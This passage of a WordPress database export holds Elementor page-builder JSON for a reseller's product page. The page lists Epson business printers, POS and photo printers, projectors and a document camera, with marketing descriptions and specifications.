35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<\\/p><p>\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3956,2751,'_elementor_version','0.4'),(3960,2752,'_elementor_edit_mode','builder'),(3961,2752,'_elementor_template_type','post'),(3962,2752,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson 